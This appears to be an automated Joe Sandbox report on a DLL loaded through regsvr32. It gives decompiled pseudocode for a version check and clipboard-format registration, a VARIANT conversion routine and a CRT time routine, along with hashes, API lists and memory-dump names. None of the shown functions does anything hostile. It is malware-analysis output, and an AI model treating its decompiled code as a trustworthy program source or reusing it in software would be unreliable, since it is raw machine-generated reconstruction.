Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: f3e3b59a713c405bc6e38702beddc650d18277c88bf38d22c0b8d84aad097ebc
Instruction ID: a9fcd8c3fbdef543b70b14635b9beb864552892ae8318635e4161e8aa83ef266
Opcode Fuzzy Hash: f3e3b59a713c405bc6e38702beddc650d18277c88bf38d22c0b8d84aad097ebc
Instruction Fuzzy Hash: D4F012719407485BD730BFB24D49B47BAD1FFC4B10F12092ED2418B990D6B5E441DF40

Uniqueness

Uniqueness Score: -1.00%

Function 1002686F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002686F() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1003a0f0 =  *0x1003a0f0 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x1003a0f0 = _t6;
					return _t6;
				}
			}

0x10026880
0x1002688a
0x1002688e
0x100268aa
0x100268aa
0x00000000
0x100268aa
0x10026890
0x10026896
0x00000000
0x00000000
0x00000000
0x10026898
0x10026898
0x1002689d
0x100268a3
0x00000000
0x100268a3

APIs

GetVersion.KERNEL32 ref: 10026877
GetVersion.KERNEL32 ref: 10026882
GetVersion.KERNEL32 ref: 1002688A
GetVersion.KERNEL32 ref: 10026890
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 1002689D

Strings

MSWHEEL_ROLLMSG, xrefs: 10026898

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 3227b10484f3ef1638ed66b77773593540a1c6792568f525d42f08afe9ffef64
Instruction ID: adb2e3465f30afb568f49f00b276de175ff8a6773755a27906a83befc949cf32
Opcode Fuzzy Hash: 3227b10484f3ef1638ed66b77773593540a1c6792568f525d42f08afe9ffef64
Instruction Fuzzy Hash: DAE04F3A8106275AE611B7A4AC4076826D8EB8D395FE20127CD0196164EF3408838AA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000F0B5 Relevance: 9.4, APIs: 6, Instructions: 384
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1000F0B5(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t155;
				signed int _t167;
				signed short _t168;
				intOrPtr* _t170;
				void* _t172;
				signed short _t181;
				signed short _t183;
				void* _t186;
				signed short _t189;
				signed short _t191;
				signed short _t196;
				signed short _t198;
				signed short _t207;
				long long* _t214;
				intOrPtr* _t218;
				void* _t220;
				void* _t226;
				void* _t229;
				intOrPtr* _t231;
				void* _t237;
				void* _t240;
				signed int _t243;
				signed short _t244;
				signed short _t245;
				signed short _t249;
				signed short _t253;
				intOrPtr* _t254;
				intOrPtr _t276;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				signed long long _t335;

				_t318 = __edx;
				E10011A8C(E1002AD75, _t327);
				_t155 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t327 - 0x10)) = _t155;
				 *(_t327 - 0x30) = 0;
				E1001064A(_t327 - 0x40);
				_t321 =  *((intOrPtr*)(__ecx + 0x54));
				 *((intOrPtr*)(_t327 - 4)) = 0;
				E1000CCB8( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B9B7(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
					E1001065D( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
								_t183 = E1000CA36(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x1002dcd0;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E10010630(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E1000CA60(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E1000B8EE(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E10010630(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E1000CA60(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E1000B94F( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E10010630(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E1000CA8A(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E1000CC20(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E10010630(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E100072DF(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E1001067D(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E10010630(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E10010579(_t327 - 0x100,  *((short*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E10010630(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E1001065D(_t327 - 0xf0, E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E10010630(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E10010630(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E1000EB21(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E1001067D(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E10010630(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E10002EB0(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E10010579(_t327 - 0x110,  *((short*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E10010630(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E100105A0(_t327 - 0xe0,  *((intOrPtr*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E10010630(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E10010630(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E10010630(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E10010630(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B9EB(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E10010630(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E1001065D( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E10011A49( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}

0x1000f0b5
0x1000f0ba
0x1000f0c5
0x1000f0cc
0x1000f0d8
0x1000f0db
0x1000f0e0
0x1000f0ec
0x1000f0ef
0x1000f0f4
0x1000f0f8
0x1000f113
0x1000f11c
0x1000f127
0x1000f127
0x1000f12b
0x1000f136
0x1000f138
0x1000f3b9
0x1000f3b9
0x1000f3be
0x00000000
0x1000f3c4
0x1000f3c4
0x1000f3c4
0x1000f3c5
0x1000f518
0x1000f51d
0x1000f51f
0x1000f525
0x1000f528
0x1000f52b
0x1000f52d
0x1000f52d
0x1000f52d
0x1000f52d
0x1000f530
0x1000f530
0x1000f52d
0x1000f538
0x1000f53b
0x1000f53d
0x1000f53f
0x1000f541
0x1000f541
0x1000f543
0x1000f546
0x1000f553
0x1000f557
0x1000f55c
0x00000000
0x1000f55c
0x1000f3cb
0x1000f3cc
0x1000f3cc
0x1000f3cd
0x1000f4bc
0x1000f4c1
0x1000f4c3
0x1000f4cd
0x1000f4d3
0x1000f4e3
0x1000f4e6
0x1000f4eb
0x1000f4f4
0x1000f4fe
0x1000f502
0x1000f507
0x00000000
0x1000f507
0x1000f3d3
0x1000f3d3
0x1000f3d3
0x1000f3d4
0x1000f45a
0x1000f45f
0x1000f461
0x1000f46b
0x1000f46e
0x1000f47e
0x1000f481
0x1000f486
0x1000f492
0x1000f4a2
0x1000f4a6
0x1000f4ab
0x00000000
0x1000f4ab
0x1000f3d6
0x1000f3d6
0x1000f3d7
0x1000f3e6
0x1000f3eb
0x1000f3ed
0x1000f417
0x1000f41c
0x1000f427
0x1000f437
0x1000f43b
0x1000f440
0x00000000
0x1000f440
0x1000f3ed
0x1000f3d7
0x1000f3d4
0x1000f3cd
0x1000f3c5
0x1000f13e
0x1000f13e
0x1000f382
0x1000f392
0x1000f396
0x1000f39f
0x1000f3a3
0x1000f3af
0x1000f3b1
0x00000000
0x1000f144
0x1000f144
0x1000f147
0x1000f254
0x1000f257
0x1000f357
0x1000f360
0x1000f364
0x1000f369
0x00000000
0x1000f25d
0x1000f25d
0x1000f260
0x1000f324
0x1000f32d
0x1000f331
0x1000f336
0x00000000
0x1000f266
0x1000f266
0x1000f269
0x1000f26f
0x1000f272
0x1000f2eb
0x1000f2f2
0x1000f2f8
0x1000f302
0x1000f306
0x1000f30b
0x00000000
0x1000f274
0x1000f274
0x1000f277
0x00000000
0x1000f279
0x1000f279
0x1000f27c
0x00000000
0x00000000
0x1000f27c
0x1000f277
0x1000f272
0x1000f269
0x1000f260
0x1000f14d
0x1000f14d
0x1000f564
0x1000f572
0x1000f582
0x1000f586
0x1000f58f
0x1000f593
0x1000f59f
0x1000f5a1
0x1000f5a4
0x1000f5a4
0x1000f5a7
0x1000f5aa
0x1000f153
0x1000f154
0x1000f154
0x1000f155
0x1000f2b3
0x1000f2c9
0x1000f2d2
0x1000f2d6
0x1000f2db
0x00000000
0x1000f15b
0x1000f15b
0x1000f15b
0x1000f15c
0x1000f282
0x1000f296
0x1000f29f
0x1000f2a3
0x1000f2a8
0x00000000
0x1000f162
0x1000f162
0x1000f162
0x1000f163
0x1000f227
0x1000f22d
0x1000f240
0x1000f244
0x1000f249
0x00000000
0x1000f169
0x1000f169
0x1000f169
0x1000f16a
0x1000f1ee
0x1000f1f4
0x1000f207
0x1000f20b
0x1000f210
0x00000000
0x1000f16c
0x1000f16c
0x1000f16c
0x1000f16d
0x1000f1b4
0x1000f1be
0x1000f1c4
0x1000f1c7
0x1000f1d1
0x1000f1d5
0x1000f1da
0x00000000
0x1000f16f
0x1000f16f
0x1000f170
0x1000f182
0x1000f188
0x1000f19b
0x1000f19f
0x1000f1a4
0x1000f446
0x1000f447
0x1000f44a
0x1000f44a
0x1000f170
0x1000f16d
0x1000f16a
0x1000f163
0x1000f15c
0x1000f155
0x1000f14d
0x1000f147
0x1000f13e
0x1000f5b6
0x1000f5bf
0x1000f5bf
0x1000f5c9
0x1000f5da

APIs

__EH_prolog.LIBCMT ref: 1000F0BA
VariantClear.OLEAUT32(?), ref: 1000F11C
VariantClear.OLEAUT32(00000007), ref: 1000F44A
VariantClear.OLEAUT32(?), ref: 1000F5BF

Part of subcall function 10010630: VariantCopy.OLEAUT32(?,?), ref: 10010638

Part of subcall function 1000B8EE: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B93C

VariantClear.OLEAUT32(?), ref: 1000F59F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$Clear$Time$CopyH_prologSystem
String ID:
API String ID: 2075586698-0
Opcode ID: 5ad6e99bdd1103fbad408b9738d1ce61ad1611e6fc0cf40d72984165b5fd7b9b
Instruction ID: 2707228918a994c6141f3d21d61e54e91ac0ab41dc8e662946a9f497bcd99bd1
Opcode Fuzzy Hash: 5ad6e99bdd1103fbad408b9738d1ce61ad1611e6fc0cf40d72984165b5fd7b9b
Instruction Fuzzy Hash: CAE16B3490055CEAEF15DF90C891AFEBBB9FF49380F00408AF945A7185DB74AE48EB61

Uniqueness

Uniqueness Score: -1.00%

Function 10013747 Relevance: 9.2, APIs: 6, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10013747(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E1001974B(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018F3F(_t121);
							__eflags =  *0x10037b6c; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x10037b68; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E100197E0(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013440(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E100197E0(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013440(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E100197E0(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013440(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019797(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x10037b70; // 0xfffff1f0
							_t86 =  *0x10037b68; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x10037b68; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018F3F( &_v12);
							_t138 =  *0x10037b6c; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E10019797(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x10037b70; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018F3F( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}

0x10013747
0x1001374e
0x10013751
0x10013754
0x10013758
0x1001375a
0x1001394f
0x1001394f
0x1001394f
0x00000000
0x1001376a
0x1001376a
0x10013770
0x00000000
0x00000000
0x10013776
0x10013780
0x10013780
0x10013781
0x10013786
0x10013789
0x1001378b
0x1001378d
0x100137f5
0x100137fa
0x10013801
0x10013803
0x1001383e
0x10013840
0x10013843
0x10013848
0x1001384a
0x1001384b
0x1001384b
0x1001384d
0x1001384f
0x10013852
0x10013855
0x1001385a
0x1001385f
0x10013861
0x10013863
0x10013868
0x1001386a
0x1001386e
0x1001386e
0x1001387b
0x10013887
0x1001388b
0x10013891
0x10013894
0x10013897
0x1001389c
0x1001389e
0x100138a1
0x100138a6
0x100138a9
0x100138ad
0x100138ad
0x100138ba
0x100138c6
0x100138ca
0x100138d0
0x100138d3
0x100138d6
0x100138db
0x100138dd
0x100138e0
0x100138e5
0x100138e8
0x100138ec
0x100138ec
0x100138f9
0x100138fe
0x10013900
0x10013903
0x10013906
0x00000000
0x10013908
0x10013908
0x1001390e
0x10013915
0x10013918
0x1001391b
0x10013921
0x10013924
0x10013927
0x10013929
0x10013947
0x10013947
0x10013947
0x1001392b
0x1001392e
0x10013931
0x10013934
0x1001393b
0x1001393b
0x00000000
0x10013929
0x1001390a
0x1001390c
0x00000000
0x00000000
0x00000000
0x1001390c
0x10013906
0x10013805
0x10013806
0x1001380b
0x1001380e
0x00000000
0x00000000
0x10013810
0x10013816
0x1001381d
0x10013824
0x10013827
0x10013829
0x1001382c
0x1001382f
0x10013836
0x10013839
0x00000000
0x10013799
0x10013799
0x1001379e
0x100137a4
0x100137a7
0x100137aa
0x100137ad
0x100137b2
0x100137b9
0x100137bb
0x100137c1
0x100137ca
0x100137d0
0x100137d5
0x100137d6
0x100137dd
0x100137e5
0x100137e8
0x100137e8
0x100137ca
0x1001394a
0x1001394a
0x10013951
0x10013954
0x10013954
0x1001378d
0x10013778
0x1001377a
0x00000000
0x00000000
0x00000000
0x1001377a

APIs

Part of subcall function 10018F3F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018FB1

__allrem.LIBCMT ref: 1001385A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001387B
__allrem.LIBCMT ref: 10013897
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100138BA
__allrem.LIBCMT ref: 100138D6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100138F9

Part of subcall function 10019797: __lock.LIBCMT ref: 100197A5

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
String ID:
API String ID: 1282128132-0
Opcode ID: ff426bf6f2de5c04749d9f75f2a35f684fd423b36e88f3697f4bd91450d6212b
Instruction ID: 35bf0928db20a43a027534d155e439d1ad7f1c48823d0ead1cebc8bc97c17753
Opcode Fuzzy Hash: ff426bf6f2de5c04749d9f75f2a35f684fd423b36e88f3697f4bd91450d6212b
Instruction Fuzzy Hash: F2619EB1A00605AFDB24CF68C881A5DBBF5FB44364F20816EE459EB291D770EE86DB00

Uniqueness

Uniqueness Score: -1.00%

Function 10018622 Relevance: 9.1, APIs: 6, Instructions: 145
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E10018622(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x1002f210);
				E10012CE0(__ebx, __edi, __esi);
				_t83 = 0;
